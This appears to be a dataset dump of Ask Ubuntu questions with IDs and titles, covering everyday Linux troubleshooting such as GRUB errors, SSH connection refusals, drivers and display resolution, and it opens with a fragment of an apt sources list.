//deb.opera.com/opera-beta/ stable non-free # opera browser ( beta releases ) # deb http : //deb.playonlinux.com/ natty main # disabled on upgrade to saucy # deb http : //deb.playonlinux.com/ natty main # disabled on upgrade to saucy # deb http : //deb.playonlinux.com/ natty main # disabled on upgrade to saucy # deb http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb-src http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb-src http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb-src http : //repo.steampowered.com/steam/ precise steam # disabled on upgrade to raring # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu raring main # deb http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu raring main # deb http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu raring main # deb http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/vincent-c/nevernote/ubuntu raring main # deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main # deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main # disabled on upgrade to saucy # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main # deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu saucy main # disabled on upgrade to saucy deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main
496790	installing 32bit wireless driver on amd64	i have a dell latitude 3330 laptop . after updates my wireless stopped working . found the drivers , deb files . when i try to install using ubuntu software centre , i am getting a message saying wrong architecture amd64 . how do i install ? thanks . suparna
496795	install monodevelop-database ( 4.0.12+dfsg-1 ) from git repository	i cloned the git repository git : //anonscm.debian.org/pkg-cli-apps/packages/monodevelop-database.git and tried to run ./configure but it gives me this error : checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... no checking for mono ... /usr/bin/mono checking for dmcs ... /usr/bin/dmcs checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for unmanaged_dependencies_mono ... yes checking for mono ... /usr/bin/mono checking for dmcs ... /usr/bin/dmcs checking for msgfmt ... /usr/bin/msgfmt checking for msgmerge ... /usr/bin/msgmerge checking for mono_addins ... no configure : error : package requirements ( mono-addins > = 0.4 ) were not met : no package 'mono-addins ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables mono_addins_cflags and mono_addins_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i am running monodevelop version 4.0.12 and mono 3.2.8 ( debian 3.2.8+dfsg-4ubuntu1 ) . what error is this and what do i do to resolve it ?
496799	heat sensor showing weird readings	each time i turn my laptop on , the temp6 sensor is stuck in +20,0ºc , so the fans never turn on and eventually my laptop turns off from overheating . if i suspend my session and then reopen , it changes to being stuck on +90,0ºc and the fans go to the maximum speed and never stop , causing a lot of noise . can anyone help me to fix this ? this is the reading i get when i reopen the session after suspending it : acpitz-virtual-0 adapter : virtual device temp1 : +16.0°c ( crit = +108.0°c ) temp2 : +43.0°c ( crit = +105.0°c ) temp3 : +39.0°c ( crit = +108.0°c ) temp4 : +43.0°c ( crit = +105.0°c ) temp5 : +20.0°c ( crit = +108.0°c ) temp6 : +90.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +44.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +37.0°c ( high = +105.0°c , crit = +105.0°c )
496800	remove other os which is installed alongside ubuntu	i have 3 oss as a triple boot . they are as follows : ⠀windows 8.1 professional edition ⠀ubuntu 14.04 trusty tahr ⠀elementary os all three oss are installed in different partitions . the problem is that the bootloader or grub loading on startup is of elementary os and i want ubuntu grub to be loaded instead , so after that i can delete the elementary os partition and remove elementary os . if i remove elementary os directly without changing the default grub than on startup , grub rescue mode will arrive and i hate that thing . i hope you understood what i want . please show me in steps or in a easy way .
496802	can not set icon	when i put file icon.png in to the usr/share/icons folder ( doing that as root ) , i ca n't set that icon on my application latter on . when i try , i navigate to the icons folder , but that icon does n't work . i ca n't even see it by navigating to icons folder one more time . i can see it or only open it when i go to the icons folder with root privileges . this happens on linux mint 17 , 32 bit . as you can see , while in regular mode , i ca n't see the picture , and while in root mode , i can edit it , so how could i be able to set it as my application icon ?
496805	unable to login via ssh to remote ubuntu machine - connection refused	i have a very recently installed ubuntu box and the only change i have made is change the hostname to mail and hosts file now says : 127.0.0.1 localhost 127.0.1.1 mail anyway if i attempt to login via ssh ( this is from a windows 7 box ) i login like this : c : \users\angus > ssh -vv acomber @ 192.168.0.52 openssh_5.4p1 , openssl 1.0.0 29 mar 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug2 : ssh_connect : needpriv 0 debug1 : connecting to 192.168.0.52 [ 192.168.0.52 ] port 22. debug1 : connect to address 192.168.0.52 port 22 : connection refused ssh : connect to host 192.168.0.52 port 22 : connection refused so does n't work . i can ping the host ok . here is my /var/log/auth.log file : acomber @ mail : ~ $ tail -f /var/log/auth.log jul 12 11:52:56 mail compiz : pam unable to dlopen ( pam_kwallet.so ) : /lib/security/pam_kwallet.so : can not open shared object file : no such file or directory jul 12 11:52:56 mail compiz : pam adding faulty module : pam_kwallet.so jul 12 11:52:56 mail compiz : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` acomber '' jul 12 11:58:40 mail compiz : gkr-pam : unlocked login keyring jul 12 12:13:44 mail compiz : pam unable to dlopen ( pam_kwallet.so ) : /lib/security/pam_kwallet.so : can not open shared object file : no such file or directory jul 12 12:13:44 mail compiz : pam adding faulty module : pam_kwallet.so jul 12 12:13:44 mail compiz : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` acomber '' jul 12 12:14:04 mail compiz : gkr-pam : unlocked login keyring jul 12 12:17:01 mail cron [ 3639 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) jul 12 12:17:01 mail cron [ 3639 ] : pam_unix ( cron : session ) : session closed for user root what does this mean : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` acomber '' do i have to specify password on ssh login ? i am new to ubuntu and so i expect it is something pretty basic that is wrong . what should i be checking from here ? update thanks for the tip saiarcot895 . if i attempt to login locally by ssh -vv acomber @ localhost i get : acomber @ mail : /etc/ssh $ ssh -vv acomber @ localhost openssh_6.6.1 , openssl 1.0.1f 6 jan 2014 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to localhost [ 127.0.0.1 ] port 22. debug1 : connect to address 127.0.0.1 port 22 : connection refused ssh : connect to host localhost port 22 : connection refused but i can login ok using xterm . so i assumed on the localhost i could connect ok. that 's confusing me because /etc/ssh/ssh_config is for the ssh client configuration ? i thought it must be a problem in ssh server config ? by the way , where do i look for ssh server config ? more info acomber @ mail : /etc/ssh $ ps aux | grep ssh acomber 2095 0.0 0.0 10616 316 ? ss 12:47 0:00 ssh-agent -s acomber 2978 0.0 0.0 15948 916 pts/1 s+ 13:08 0:00 grep -- color=auto ssh acomber @ mail : /etc/ssh $ netstat -l | grep ssh unix 2 [ acc ] stream listening 13527 /tmp/ssh-joanpbvppnt3/agent.2094 unix 2 [ acc ] stream listening 14292 /run/user/1000/keyring-m9anig/ssh how does xterm work then ? i assumed it must connect to an ssh server ? ? ?
496811	grub rescue - error unknown filesystem	i am using windows 7 ultimate and ubuntu in my home desktop . when my local disks were about to get filled up , i tried to delete the ubuntu partition . i did it from windows . i right clicked on my computer- > manage and partitioned . i deleted the ubuntu partition and some local disks and then i repartitioned my harddrive . i used my computer for about 2 hours and then shut it down . when i powered it on after sometimes it shows like error message : error : unknown filesystem . grub rescue > when i use ls command it shows like this error : unknown filesystem grub rescue > ls ( hd0 ) ( hd0 , 10 ) ( hd0 , 9 ) ( hd0 , 8 ) ( hd0 , 7 ) ( hd0 , 6 ) ( hd0 , 5 ) ( hd0 , 2 ) ( hd0 , 1 ) grub rescue > what to do now ?
496812	blank screen after update this week on two different computers	i have two older style laptops - a toshiba satellite pro a200 and a fujitsu amilo li 1818 . they are both set up using a dual boot to either run windows 7 professional or the latest version of ubuntu . both have been running perfectly up until this week . i ran update on the fujitsu and thereafter i get a blank screen on trying to boot into ubuntu , whereas windows still boots perfectly . i tried various things to try to overcome this eg selecting the second option 'advanced options for ubuntu ' and then selecting earlier versions eg 'ubuntu , with linux 3.13.0-24 generic ' and running repair broken packages , rebuild grub etc to no avail . i downloaded the boot-repair utility and burned it to cd i booted from the cd and ran the recommended option . the computer will still not boot , but i noted the web-page as ... . http : //paste.ubuntu.com/7774668/ with some trepidation , i ran update on my second laptop , the toshiba - once more a blank screen on bootup . this time i tried reinstalling ubuntu 14.04 from a usb stick , but still the blank screen on bootup . the two computers have the same graphics card - 'mobile intel 945 express graphics ' . i strongly suspect that one of the files in the ubuntu update this week ( week commencing 6th july 2014 ) has perhaps altered a graphics driver file which is now incompatible and thus the computer has booted up into ubuntu but there is nothing visible on the blank screen . please can you communicate this problem to the update team as i am at present back to using microsoft windows as neither computer now runs ubuntu . if anyone has a 'fix ' to this problem , i would be most interested to hear it ! thanks . ** malcolm brown
496815	resolution problem using ubutu 14.04	i 'm completely new on ubuntu and using virtualbox v 4.3 on a windows 8 host ( bootcamp on an imac 27 '' ) . i installed ubuntu 14.04 . the only resolution available was 640x480 . so i downloaded the virtualbox guest additions ( vboxguestadditions_4.3.12.iso ) from this link http : //download.virtualbox.org/virtualbox/4.3.12/ and installed it by going to the ubuntu terminal and using the command sudo apt-get install virtualbox-guest-dkms i restarted the system , and voilă the resolution got to its maximum ( 2560x1440 ) . shut down the machine after realising that firefox was being a bit laggy and decided to allocate more video memory via virtualbox > config ( changed from 16mo to 64 mo ) . i started ubuntu , and saw that the max resolution was no longer 2560x1440 , but dropped to 1600x1200 . what is the source of this problem and how do i fix it ?
496816	solved : menu bars and launcher missing ( after tampering with xorg.conf )	i 'm completely new to ubuntu , and i 'm trying to get to know the various stuff in here . one of these things was to set my screen resolution to 16 bit , in order to play an old game . after browsing through a bunch of questions here , i figured i had to create an xorg.conf file in /etc/x11 ( in the latest version of ubuntu , this file did n't already exist , i think ) , and fill it with section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 16 endsection and i did . after doing this and rebooting , however , i found my desktop displaying 16 bit colour depth , but there was no launcher , no menu bars at the top of the screen , or at the top of any open folder or program . luckily , i had an applications folder on the otherwise empty desktop , and managed to browse through other folders from there . but most applications in the folder now have blank icons , and new names , ending with `` .desktop '' , and attempting to open them results in '' untrusted application launcher the application launcher `` debian-xterm.desktop '' ( or any other name ) has not been marked as trusted . if you do not know the source of this file , launching may be unsafe . '' and there 's only a cancel button present . not option to launch anyway . this , however , has been partially resolved through the terminal , where i sudo chmod +x the applications i need to use ( network , firefox and things like that ) . going through all the applications this way seems like a lot of hopefully unnecessary work , though . i 've looked at a lot of different questions about the menu bars and launcher missing , but none have helped fix the problem . i managed through the terminal to delete xorg.conf , and while the screen is back to 32 bit , the launcher and menu is still missing . the super key ( windows key on my keyboard ) does n't work either . any ideas what i could do to make things work again ? eta : typing sudo chmod +x /home/jarle/desktop/applications/*.desktop fixed all the application files . and i figured that one out all by myself . yay ! now , all i need is the launcher and menus ... eta2 : solved ! it worked ! first , i typed dconf reset -f /org/compiz/ then unity -- reset-icons & disown and then did your thing , wilf . and everything is back in order now . but what caused this ? can i try to create xorg.config over again in order to decide my colour depth for when i want to play games that require 16 bit , or will this mess everything up again ?
496820	x server config used by lightdm	what i want to do is to start a x server just like the lightdm did . but i ca n't get the x server perform just like the one started by lightdm . i see the x server process executed by lightdm is : root 4984 4978 4 19:57 tty7 00:00:48 /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch when i stop the lightdm and used the command above to start an x server , it works , but i feel something different , the performance and some advanced support . for example , using the x server i started , i may get some errors when running android emulator with gpu support : create pbuffer failed . ( this error also arise when i use xvfb ) creategraphicbuffer failed . ( something like that , i get this error from the adb logcat . ) while all these errors never arise when i using the lightdm ( the ubuntu gui ) . can someone tell me the different of the configs used by x server which started by the lightdm and the one i started manually . ps : i also used the config file generated by : sudo x -configure but it seem more like the x server i start without a config file . and i do n't know how to modify the config file so that the x server can perform the same in the lightdm . thanks .
496822	access to the terminal while you are on vim	is there a way to access the terminal while using vim ? i do not like to open another terminal or save and exit the current terminal .
496823	can i stop nfs shares appearing in the launcher ?	i have about half a dozen nfs shares mapped to my ubuntu 14.04 box . each one of them shows up as an icon in the unity launcher . this is unnecessary and annoying - they take up a fair bit of space , and in any case i only need them to be visible from nautilus , which they are . right clicking any of them and 'unlock from launcher ' gets rid of all of them . but they come back the next time i log on , or if i remount them , or sometimes seemingly at random . is it possible to stop them appearing in the launcher ever ? running dconf-editor - > com - > canonical - > unity - > devices shows something is blacklisted , and removing an nfs from the launcher appends '- ' to it .
496826	typing multiple line commands in the terminal	i know that i can copy paste this command in my terminal , but how do i type this ? make ex1 cc ex1.c -o ex1 typing it all on one line produces the following : make : nothing to be done for ex1 . make : *** no rule to make target cc . stop .
496827	well-known packages are not shown in synaptic package manager	i 've installed ubuntu 12.04 lts , both on my laptop and desktop pc . i 've run sudo apt-get update on both of the platforms . in my pc i can install these packages by searching in `` synaptic package manager '' : build-essential cmake ant jdk7 ... .. but in my laptop i can not find theses packages in `` synaptic package manager '' . i 've installed both of the operating systems from the same .iso file . why in my laptop i ca n't find most of the packages that i find in my pc ? is there something wrong with my repositories ?
496830	how can i install two paralel ubuntu systems with encrypted partition ?	how can i install two parallel ubuntu 14.04 systems each with encrypted and custom sized partitions ? during the installation of the second system the option for encryption is disabled .
496831	upgrade from 12.04lts to 14.04lts login loop	kinda a newb but i upgraded from 12 to 14 when i did i changed my login password now when i try and login i get into a loop , if i do this i can login in '' these suggested instructions apply to my case only and should be considered as a non-professional comment and therefore to be tried at your own risk . i am using acer aspire 4755g with ubuntu 12.04.1 lts . i have also encountered this problem , and in my case , i had a problem with lightdm . as a temporary measure , when you get to the login screen , press the keyboard sequence ctrl+alt+f1 . this will get you to a terminal-like screen . it will show you something like this : [ computer name ] login : for example , aspire-4755g login : type in your username and press enter . this will result into something like this , aspire-4755g login : shiela password : enter your password , and , if correct , would show something like this : aspire-4755g login : shiela password : last login : tue jan 1 06:45:02 jpt 2013 on tty1 welcome to ubuntu 12.04.1 lts ( gnu/linux 3.2.0-35-generic-pae i686 ) documentation : https : //help.ubuntu.com/ 2 packages can be updated . 0 update are security updates . shiela @ aspire-4755g : ~s then , press the keyboard sequence ctrl+alt+f7 to get you back to the login screen . this procedure logs you into the system using the terminal-like window . you can now try to login to your account using the login screen . in my experience , i was able to reach the desktop . it seems that there is something wrong with the lightdm configuration that it was not able to log you in to the system . should you not make it to the desktop ( as it was called in windows ) , you may try adding an additional command by pressing the ctrl+alt+f1 : shiela @ aspire-4755g : ~s ecryptfs-mount-private press enter , and it will ask you your password . enter your password , then press the keyboard sequence ctrl+alt+f7 to get you back to the login screen ( or to where you last left ) . this command loads your home folder , together with its contents , should you have chosen to encrypt the home folder upon installation of ubuntu . once successful , you may try to review your lightdm configuration located on /etc/lightdm/lightdm.conf . '' but i ca n't see doing this every single time . i tried changing my password back to my original but ubuntu wo n't accept it ( made it super easy b/c it 's a shared computer for my whole family if anyone has any advice please feel free to share . also whe i went to try and config lighten it tells me permission denied and if i try sudo in front i get command not found . thanks in advance .
496835	how to execute a command with `` = '' sign in a desktop shortcut ?	i 'm trying to modify my firefox shortcut in unity so that it started with a specific parameter . from a terminal , i would start like this : vdpau_driver=va_gl firefox i tried modifying the firefox.desktop file so that the exec line looked like exec=vdpau_driver=va_gl firefox but this does n't work ( the application does n't start ) . i thought it could be a problem with two `` = '' signs , so i tried exec= '' vdpau_driver=va_gl firefox '' but this does n't work either . what should i do ?
496838	how can i get the default ubuntu boot logo back after returning from using xubuntu ?	i installed xubuntu-desktop and starting using the xfce based desktop after a falling out with unity . now i 've returned to using the unity desktop but i 'm left with the xubuntu boot screens . how can i remove/change them back to the defaults ?
496843	ca n't change monitor to native resolution	i 'm using a laptop running ubuntu 14.04 lte , and i have secondary monitor lg flatron m197wd , which according to the lg website can run in a 1366x768 resolution . this mode did n't show up in either the 'displays ' panel , or in xrandr 's output . so i tried adding the mode : $ cvt 1366 768 60 # 1368x768 59.88 hz ( cvt ) hsync : 47.79 khz ; pclk : 85.25 mhz modeline `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync which should give me the modeline for height=1366 , but instead gives me 1368 . now i still ca n't set the resolution i want . any idea why this happens , and how i can still set my external monitor to 1366x768 ? ( btw , i 'm using hdmi with intel integrated graphics )
496849	uninstall ati catalyst control drivers ubuntu 12.04	i followed the steps described on http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install and now my ubuntu gives me the blank screen .. i tried a lot of things to uninstall ati catalyst but still unable too do so . so can any body please guide me how to do so edit : i can connect to the internet in recovery mode . my graphic card is amd radeon hd 6490m
496852	how to allow users for a printer ?	i have n't been able to get my epson xp-212 printer working with ubuntu 12.04 . i have installed necessary drivers from epson 's website but when trying to print some files , nothing really happens ; the paper just flows through without any printings . so , i 'm wondering if i should define or allow users for this printer and if so , how it is done . i have tried to edit the printers.conf file but unsure if that is the right way . thanks for help .
496853	another software-center crash	while upgrading from ubuntu 12.04 to 14.04 i received several ( 2-3 ) error messages which i allowed to communicate . after completing the upgrade , i tried to run software-center from the icon with no luck . then , i tried sudo-apt get update , sudo apt-get autoremove , i removed and re-installed software-center ( sudo apt-get remove software-center and sudo apt-get install software center ) but i keep getting the same error : ( copied from my terminal ) 2014-07-12 15:35:56,123 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-07-12 15:35:57,787 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2014-07-12 15:35:57,787 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in init self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in init self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 74 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in call return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in call **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 i guess this has something to do with python , but have no idea how to fix it . any help would be appreciated pablo
496856	ubuntu-tweek installation error	i 've ubuntu-tweak 0.8.7-1trusty2 trying installing on ubuntu 14.04 lts error is : dependency is not satisfiable : gksu how to solve it ?
496857	2 os 's at once on the same computer ?	is it possible to run windows vista on one hard drive and ubuntu 14.04 on the other using the same computer ?
496864	how to extract this package archive	i am trying to extract a certain file in the downloads folder and instructions given to me are as follows : type the following in terminal and it will be done tar -xvjf tor-browser-linux32-3.6.2_enus.tar.xz but when i type it in terminal it gives error : tar ( child ) : tor-browser-linux32-3.6.2_enus.tar.xz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now
496865	ubuntu touch tablet	when is the official release date of ubuntu touch ? can i install it on kindle fire tablet ? which tablets are supported ? i am looking to have ubuntu tablet since i do n't like any of the tablets available in the market . i like the size and feel of kindle fire tablets . so please advice on the release date and which tablets are the best fit ?
496874	change where gedit saves temp files	looking for a way to put gedit 's temporary tilde files in a different directory than the one i 'm working in . is there a way to do this ?
496875	no network connection after update	the whole network connection is disabled after update from 1.4.18-1ubuntu1.4 to1.4.18-1ubuntu1.4 . the wifi icon is not visible , wired connection is not possible because it is not detecting it in network connections menu . please let me know if this problem could be fixed through terminal or any other possible ways .
496876	graphics are very slow on ubuntu 14.04	i realise there are many threads regarding this issue . nonetheless i 've tried different solutions unsuccessfully . the problem : the graphical performance is very slow , windows motion not fluid at all , typing relatively slower than when i 'm using my host system ( windows ) . here are my system specs using lshw aetos-virtualbox description : computer product : virtualbox ( ) vendor : innotek gmbh version : 1.2 serial : 0 width : 64 bits capabilities : smbios-2.5 dmi-2.5 vsyscall32 configuration : family=virtual machine uuid=820c9f41-5397-418f-a18f-85aba9edad7d *-core description : motherboard product : virtualbox vendor : oracle corporation physical id : 0 version : 1.2 serial : 0 *-firmware description : bios vendor : innotek gmbh physical id : 0 version : virtualbox date : 12/01/2006 size : 128kib capabilities : isa pci cdboot bootselect int9keyboard int10video acpi *-memory description : system memory physical id : 1 size : 7985mib *-cpu product : intel ( r ) core ( tm ) i5-2400 cpu @ 3.10ghz vendor : intel corp. physical id : 2 bus info : cpu @ 0 width : 64 bits apabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx rdtscp x86-64 constant_tsc rep_good nopl pni monitor ssse3 lahf_lm *-pci description : host bridge product : 440fx - 82441fx pmc [ natoma ] vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 02 width : 32 bits clock : 33mhz *-isa description : isa bridge product : 82371sb piix3 isa [ natoma/triton ii ] vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : isa bus_master configuration : latency=0 *-ide description : ide interface product : 82371ab/eb/mb piix4 ide vendor : intel corporation physical id : 1.1 bus info : pci @ 0000:00:01.1 version : 01 width : 32 bits clock : 33mhz capabilities : ide bus_master configuration : driver=ata_piix latency=64 resources : irq:0 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : d000 ( size=16 ) *-display unclaimed description : vga compatible controller product : virtualbox graphics adapter vendor : innotek systemberatung gmbh physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : vga_controller bus_master configuration : latency=0 resources : memory : e0000000-e7ffffff and i did a test via run manager , the graphics tests result is this : graphics/driver_version passed graphics/display passed graphics/resolution passed graphics/compiz_check failed not software rendered : no compiz supported : no graphics/vesa_drivers_not_in_use passed graphics/minimum_resolution passed more information : i allocated 128 mo to graphical memory via virtualbox configuration ( before strating system ) . i checked 3d acceleration option . i installed virtual box guest additions no graphical proprietary drivers are being used virtualbox version : 3.4.12
496878	installing openoffice	i am new to ubuntu and i am attempting to install openoffice . ( libre office does not recognise conditional formatting and hence the dependant macros in my oo spreadsheets ) and i am not prepared to write new ones ) . i get a load of deb files . i understand that a deb file opens by double clicking it but which one comes first as i always get a message `` dependency is not satisfiable : openoffice '' i am trying to move from xp for obvious reasons . i am having the same problem with google earth . any help would be greatly appreciated , but no technical dissertations please i like to lead a simple life .
496879	trouble installing ubuntu via a bootable flash drive , created on mac	my brother recently decided to build a computer , but i had the privilege to put it together and to download ubuntu . i created a bootable drive , on my mac , using the 64 bit version of ubuntu . when that did n't work , i used the 32 bit version , again with no luck . when i start my computer , i am given the options to try ubuntu , or to download it . however , this will go away in about 3 seconds , and restart my computer . if i change the way i am accessing ubuntu , i am able to scan for errors , and run recovery mode . when i scan , it says that there is an error in one file . after i saw that , i put the computer in recovery mode and select the option to recover broken files ( dkpge or something ) . the computer then does its thing , and it says it is finished . once i hit ok , i get a message saying that they computer will restart and launch ubuntu . however , it does n't restart , and just launches the os , but in a very blown up graphics style . i am able to stay here with no problems . from here , i have wiped my drive completely and reinstalled ubuntu . when it is finished installing , i get a message telling me i can either restart , or continue using the computer , in a limited mode . however , the computer quickly reboots , and this starts all over again . if i just let it run , i am able to get to the log in menu , but it disappear and restart the computer . occasionally , i am able to type in my password very quickly and get through . however , this will only last about 5 minutes , and it restarts . the specs are : cpu : amd a10-5800k apu ram : corsair vengeance ( cmz8gx3m1a1600c10 ) hdd : western digital blue 1tb motherboard : msi a78m-e35 fm2+ / fm2 amd a78 also , the computer never shuts down , only reboots . the power led and fans stay on the entire time
496881	update manager message `` new hardware support is available ''	i have n't seen this message from update manager before , and i have not been able to google up any info . what will be installed when i click install ? ( clicking `` description of update '' got me nothing ... )
496882	mycraft download error	hi i purchased and attempted to download mycraft , but there was an error in the download . no option to attempt another download , just offer to buy again . suggestions ?
496887	external password protected hard drive not mounting	i 've got a wd elements 1 tb hard drive that wo n't mount . it used to work fine in windows 7 . now , it does n't work in windows too . the drive appears in disk utilities under disk drives as being device /dev/sdb . the problem is it wo n't mount . when typing the following command : sudo mount /dev/sdb i get this : mount : ca n't find /dev/sdb in /etc/fstab or /etc/mtab and on typing : $ sudo fdisk -l i get this : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x10661065 device boot start end blocks id system /dev/sda1 * 63 61432559 30716248+ 7 hpfs/ntfs/exfat /dev/sda2 61432560 312560639 125564040 f w95 ext 'd ( lba ) /dev/sda5 61432623 108936764 23752071 7 hpfs/ntfs/exfat /dev/sda6 143348058 225263429 40957686 7 hpfs/ntfs/exfat /dev/sda7 225263493 312560639 43648573+ 7 hpfs/ntfs/exfat /dev/sda8 108936828 141821819 16442496 83 linux /dev/sda9 141821883 143347994 763056 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 1000.2 gb , 1000202043392 bytes 255 heads , 63 sectors/track , 121600 cylinders , total 1953519616 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002846e device boot start end blocks id system /dev/sdb1 2048 1953519615 976758784 7 hpfs/ntfs/exfat
496889	files disappear when moved to desktop	i was in my home folder and i moved my .minecraft folder to the desktop and it disappeared ! i know it is still because if i create a new folder called .minecraft on the desktop , it says i ca n't do that because there is already a folder called that on the desktop . i have very little ubuntu experience and i am running 12.04 unity . do you have any idea of how to get it back ?
496893	how to launch sh file without terminal ?	using ubuntu 14.10 the sh file will only open in a text editor but not opening the game xonotic and assaultcube
496894	i have installed windows 8.1 along with ubuntu 14.04 but grub does n't show option to boot windows 8.1	i have installed windows 8.1 along with ubuntu as ubuntu was previously installed and the i installed windows 8.1 now upon repairing grub it do not show me the option to boot windows 8 , it only shows ubuntu in the boot menu . my paste url is [ ^ ] can any body help me with this ?
496896	unable to use keyboard at grub menu os selection	i am dual-booting windows and ubuntu . recently i bought a new keyboard , the problem is that the keyboard does not work on the grub menu . on the login screen and desktop , the keyboard works fine .
496897	can apparmor have default policies for all applications without profiles ?	goal : deny all applications network access and all network access for one or more explicitly specified applications .
496902	format hard drives w/o live cd	someone gave me their laptop , and it has ububtu on it . i have to reformat the hard dive . how can i do this without the ubuntu disks ?
